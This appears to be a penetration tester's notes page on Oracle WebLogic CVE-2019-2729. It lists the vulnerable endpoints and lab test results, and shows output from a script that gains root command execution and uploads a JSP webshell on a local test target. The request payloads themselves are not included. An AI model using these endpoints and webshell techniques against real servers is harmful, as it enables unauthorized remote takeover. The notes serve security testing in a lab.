WebLogic - CVE-2019-2729

Oracle WebLogic server is affected by a remote code execution vulnerability in wls-wsat.war and wls9_async_response.war packages due to unsafe deserialization of Java objects. A remote unauthenticated attacker can exploit the issue by sending a custom Java serialized object via HTTP request to execute arbitrary Java code in the context of the web server.

Exploiting wls-wsat.war will return command output, while wls9_async_response.war is blind.

Affected versions: 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0

Vulnerable endpoints

## wls-wsat.war (cmd response)
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

## wls9_async_response.war (blind)
/_async/AsyncResponseService

Test data

Version
Image
Result
Reason

10.3.6.0

VulnHub 10.3.6.0-2017

Vulnerable

wls-wsat deserialization

12.2.1.3

VulnHub 12.2.1.3-2018

Not vulnerable

Endpoints missing

12.2.1.3

VulnHub 12.2.1.3

Not vulnerable

Endpoints missing

12.2.1.3

weblogic:12.2.1.3

Inconclusive

"Old format work area header is disabled."

Request 01, RCE on version 10.3.6.0:

Request 02, designed for version 10.2.7.1, RCE on 10.3.6.0:

Request 03, designed for version 10.3.6.0, RCE on 10.3.6.0:

Request 04, designed for version 10.3.6.2, RCE on 10.3.6.0:

Request 05, designed for version 12.2.1.3, error "Old format work area header is disabled." on version 12.2.1.3. Not sure if this is an error caused by my container, need more test data.

Scripts

weblogic_get_webshell.py - runs three payloads on target at once, by rootedshell.

» python3 weblogic_get_webshell.py http://127.0.0.1:7003
--- payload2.txt (weblogic 10.3.6) ---
http://127.0.0.1:7003/wls-wsat/CoordinatorPortType
whoami : 
root
--- payload.txt, uploading webshell '.s8Jn4WlqX2c592.jsp' ---
http://127.0.0.1:7003/_async/.s8Jn4gWlqX2c592.jsp?cmd=whoami
Cookie:JSESSIONID=DxZLnCLX1y5BPn1Yw9GrpYVFR0NQQhyrk1qFXsQ1Pz2qQbW1lyKR!903277329; path=/; HttpOnly
whoami:
root

As there are few public exploits using the /_async/ endpoint, I've modified rootedshells script to only upload a webshell and allow direct command execution. The script can be found here.

Last updated

Was this helpful?